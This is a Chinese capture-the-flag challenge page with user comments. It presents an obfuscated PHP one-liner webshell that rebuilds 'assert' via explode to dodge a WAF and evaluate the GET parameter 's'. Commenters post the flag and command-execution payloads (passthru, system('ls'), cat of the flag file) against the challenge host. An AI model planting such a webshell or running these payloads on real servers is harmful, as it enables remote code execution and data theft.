shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 6070
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
...
登录回复
评论
wxy1343 2年前
举报

flag{5104494e7b5ec21c02e3d1c5985a4e89}

回复 0
wxy1343 2年前
举报

http://114.67.175.224:11167/index.php?s=passthru(%27cat%20flaga15808abee46a1d5.txt%27)

回复 0
我爱你制杖 2年前
举报

注意描述,explode为分搁符。绕来绕去就是:assert($_GET['s'])

回复 1
xclay 2年前
举报

这题告诉我们,学什么渗透,直接猜开发者留下的接口就可以了

回复 4
2224525664 2年前
举报

没有提示的话这题是不是就做不出来了?

回复 1
Miludear 2年前
举报

不懂语法的可直接参考 https://blog.csdn.net/changer_we/article/details/89304399 大佬的文章,很不错,简单易懂!

回复 2
zmcck 2年前
举报

assert(s) ?s=system("ls") ?s=system("cat flag***.txt")

回复 0
17695688750 2年前
举报

命令执行漏洞,我以为s和url间隔要用/隔开,没想到要用?隔开,淦

回复 0
XD6 2年前
举报

有点蠢

回复 0
bright0flavor 2年前
举报

①var_dump(scandir('./')) ②var_dump(file_get_contents('flaga15808abee46a1d5.txt'))

回复 1

WriteUp

image
harry

3 金币

立即查看

评分(8)

解题动态

testda 攻破了该题 1小时前
Cyyyyg 攻破了该题 3小时前
goeasy 攻破了该题 5小时前
867736371 攻破了该题 6小时前
废柴小白 攻破了该题 6小时前
19893123836 攻破了该题 6小时前
baza 攻破了该题 17小时前
qwerfsafafa 攻破了该题 23小时前
Hehe0619 攻破了该题 1天前
ahco 攻破了该题 1天前
17335918325 攻破了该题 1天前
17365797718 攻破了该题 2天前
afanda 攻破了该题 2天前
zhouzehui57 攻破了该题 2天前
小白ctf 攻破了该题 3天前
rufeii 攻破了该题 3天前
qwerasdz 攻破了该题 3天前
awuawu 攻破了该题 3天前
dwx1583 攻破了该题 4天前
人闲桂花落 攻破了该题 4天前
问题反馈